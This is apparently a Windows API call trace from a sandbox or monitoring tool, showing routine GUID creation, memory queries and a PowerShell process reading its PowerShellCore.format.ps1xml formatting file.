	[0111.811] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x6235b6ad, Data2=0x4503, Data3=0x4a3e, Data4=([0]=0x89, [1]=0x7d, [2]=0x87, [3]=0x1b, [4]=0xf1, [5]=0x5b, [6]=0x24, [7]=0x5c))) returned 0x0
	[0111.812] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xde6ff8a7, Data2=0x80a3, Data3=0x4d36, Data4=([0]=0x83, [1]=0x9a, [2]=0xb2, [3]=0xf, [4]=0x4d, [5]=0xec, [6]=0x50, [7]=0x16))) returned 0x0
	[0111.812] VirtualQuery (in: lpAddress=0xcb090, lpBuffer=0xcbf50, dwLength=0x30 | out: lpBuffer=0xcbf50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.812] VirtualQuery (in: lpAddress=0xcb090, lpBuffer=0xcbf50, dwLength=0x30 | out: lpBuffer=0xcbf50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.812] VirtualQuery (in: lpAddress=0xcb120, lpBuffer=0xcbfe0, dwLength=0x30 | out: lpBuffer=0xcbfe0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.813] VirtualQuery (in: lpAddress=0xcb090, lpBuffer=0xcbf50, dwLength=0x30 | out: lpBuffer=0xcbf50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.813] VirtualQuery (in: lpAddress=0xcb120, lpBuffer=0xcbfe0, dwLength=0x30 | out: lpBuffer=0xcbfe0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.813] VirtualQuery (in: lpAddress=0xcb090, lpBuffer=0xcbf50, dwLength=0x30 | out: lpBuffer=0xcbf50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.814] VirtualQuery (in: lpAddress=0xcb120, lpBuffer=0xcbfe0, dwLength=0x30 | out: lpBuffer=0xcbfe0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.814] VirtualQuery (in: lpAddress=0xcb090, lpBuffer=0xcbf50, dwLength=0x30 | out: lpBuffer=0xcbf50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.814] VirtualQuery (in: lpAddress=0xcb120, lpBuffer=0xcbfe0, dwLength=0x30 | out: lpBuffer=0xcbfe0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.815] VirtualQuery (in: lpAddress=0xcb090, lpBuffer=0xcbf50, dwLength=0x30 | out: lpBuffer=0xcbf50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.815] VirtualQuery (in: lpAddress=0xcb120, lpBuffer=0xcbfe0, dwLength=0x30 | out: lpBuffer=0xcbfe0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.815] VirtualQuery (in: lpAddress=0xcb090, lpBuffer=0xcbf50, dwLength=0x30 | out: lpBuffer=0xcbf50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.815] VirtualQuery (in: lpAddress=0xcb120, lpBuffer=0xcbfe0, dwLength=0x30 | out: lpBuffer=0xcbfe0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.816] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.816] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.817] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.817] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.818] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.818] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.818] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.818] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xf8d27e56, Data2=0xcbe9, Data3=0x4551, Data4=([0]=0xb0, [1]=0xcf, [2]=0xf9, [3]=0xc0, [4]=0x5d, [5]=0x2c, [6]=0x86, [7]=0x11))) returned 0x0
	[0111.819] VirtualQuery (in: lpAddress=0xcb9a0, lpBuffer=0xcc860, dwLength=0x30 | out: lpBuffer=0xcc860*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.819] VirtualQuery (in: lpAddress=0xcb9a0, lpBuffer=0xcc860, dwLength=0x30 | out: lpBuffer=0xcc860*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.819] VirtualQuery (in: lpAddress=0xcba30, lpBuffer=0xcc8f0, dwLength=0x30 | out: lpBuffer=0xcc8f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.819] VirtualQuery (in: lpAddress=0xcb9a0, lpBuffer=0xcc860, dwLength=0x30 | out: lpBuffer=0xcc860*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.820] VirtualQuery (in: lpAddress=0xcba30, lpBuffer=0xcc8f0, dwLength=0x30 | out: lpBuffer=0xcc8f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.820] VirtualQuery (in: lpAddress=0xcb9a0, lpBuffer=0xcc860, dwLength=0x30 | out: lpBuffer=0xcc860*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.820] VirtualQuery (in: lpAddress=0xcba30, lpBuffer=0xcc8f0, dwLength=0x30 | out: lpBuffer=0xcc8f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.821] VirtualQuery (in: lpAddress=0xcb9a0, lpBuffer=0xcc860, dwLength=0x30 | out: lpBuffer=0xcc860*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.821] VirtualQuery (in: lpAddress=0xcba30, lpBuffer=0xcc8f0, dwLength=0x30 | out: lpBuffer=0xcc8f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.821] VirtualQuery (in: lpAddress=0xcb9a0, lpBuffer=0xcc860, dwLength=0x30 | out: lpBuffer=0xcc860*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.822] VirtualQuery (in: lpAddress=0xcba30, lpBuffer=0xcc8f0, dwLength=0x30 | out: lpBuffer=0xcc8f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.822] VirtualQuery (in: lpAddress=0xcb9a0, lpBuffer=0xcc860, dwLength=0x30 | out: lpBuffer=0xcc860*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.822] VirtualQuery (in: lpAddress=0xcba30, lpBuffer=0xcc8f0, dwLength=0x30 | out: lpBuffer=0xcc8f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.823] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.823] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.824] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.824] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.824] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.825] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.825] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.825] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xe25ef4db, Data2=0xbed7, Data3=0x45b1, Data4=([0]=0x97, [1]=0x99, [2]=0x49, [3]=0xc1, [4]=0x13, [5]=0x2a, [6]=0x6f, [7]=0x1c))) returned 0x0
	[0111.825] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.826] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.826] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.826] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.827] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.827] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.827] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.827] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.827] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.827] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.828] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.828] VirtualQuery (in: lpAddress=0xcb660, lpBuffer=0xcc520, dwLength=0x30 | out: lpBuffer=0xcc520*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.828] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.829] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.829] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.829] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.829] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xdac27d90, Data2=0x7d0c, Data3=0x4b5d, Data4=([0]=0x93, [1]=0xa6, [2]=0x3e, [3]=0x40, [4]=0x81, [5]=0x6, [6]=0xad, [7]=0x38))) returned 0x0
	[0111.830] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x9441ec61, Data2=0x636b, Data3=0x47b0, Data4=([0]=0xa5, [1]=0x17, [2]=0xaf, [3]=0x10, [4]=0x42, [5]=0x93, [6]=0x5f, [7]=0x2d))) returned 0x0
	[0111.830] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xa1d3337c, Data2=0x3c8a, Data3=0x44ab, Data4=([0]=0x8a, [1]=0x9b, [2]=0x29, [3]=0x72, [4]=0x3c, [5]=0x6c, [6]=0x6b, [7]=0x6a))) returned 0x0
	[0111.830] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x59e69c43, Data2=0x85fc, Data3=0x460d, Data4=([0]=0xb3, [1]=0x81, [2]=0x1b, [3]=0x55, [4]=0x27, [5]=0x70, [6]=0xd2, [7]=0x8e))) returned 0x0
	[0111.831] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x81ebe205, Data2=0xf3c1, Data3=0x4b49, Data4=([0]=0x80, [1]=0x90, [2]=0xa, [3]=0xcf, [4]=0xe5, [5]=0x1b, [6]=0xea, [7]=0xe5))) returned 0x0
	[0111.831] VirtualQuery (in: lpAddress=0xcb770, lpBuffer=0xcc630, dwLength=0x30 | out: lpBuffer=0xcc630*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.832] VirtualQuery (in: lpAddress=0xcb800, lpBuffer=0xcc6c0, dwLength=0x30 | out: lpBuffer=0xcc6c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.832] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x1424d2ca, Data2=0x59cd, Data3=0x4f36, Data4=([0]=0x9a, [1]=0xc6, [2]=0x71, [3]=0x36, [4]=0xfe, [5]=0x80, [6]=0xc0, [7]=0x19))) returned 0x0
	[0111.832] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xa1a74e1b, Data2=0xbc9a, Data3=0x4716, Data4=([0]=0x9c, [1]=0x87, [2]=0x4a, [3]=0xfd, [4]=0x28, [5]=0x1b, [6]=0x74, [7]=0x58))) returned 0x0
	[0111.833] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xcd494378, Data2=0x4420, Data3=0x4496, Data4=([0]=0x98, [1]=0xe3, [2]=0xca, [3]=0xeb, [4]=0x66, [5]=0xa1, [6]=0xbb, [7]=0x59))) returned 0x0
	[0111.833] SetErrorMode (uMode=0x1) returned 0x1
	[0111.833] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0111.834] SetErrorMode (uMode=0x1) returned 0x1
	[0111.834] GetFileType (hFile=0x330) returned 0x1
	[0111.834] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.835] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.835] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.836] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.836] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.836] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.836] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.836] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.837] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.891] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.891] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.891] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.892] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.892] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.892] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.892] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.892] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.893] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.894] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0111.894] ReadFile (in: hFile=0x330, lpBuffer=0x3a9a370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3a9a370*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
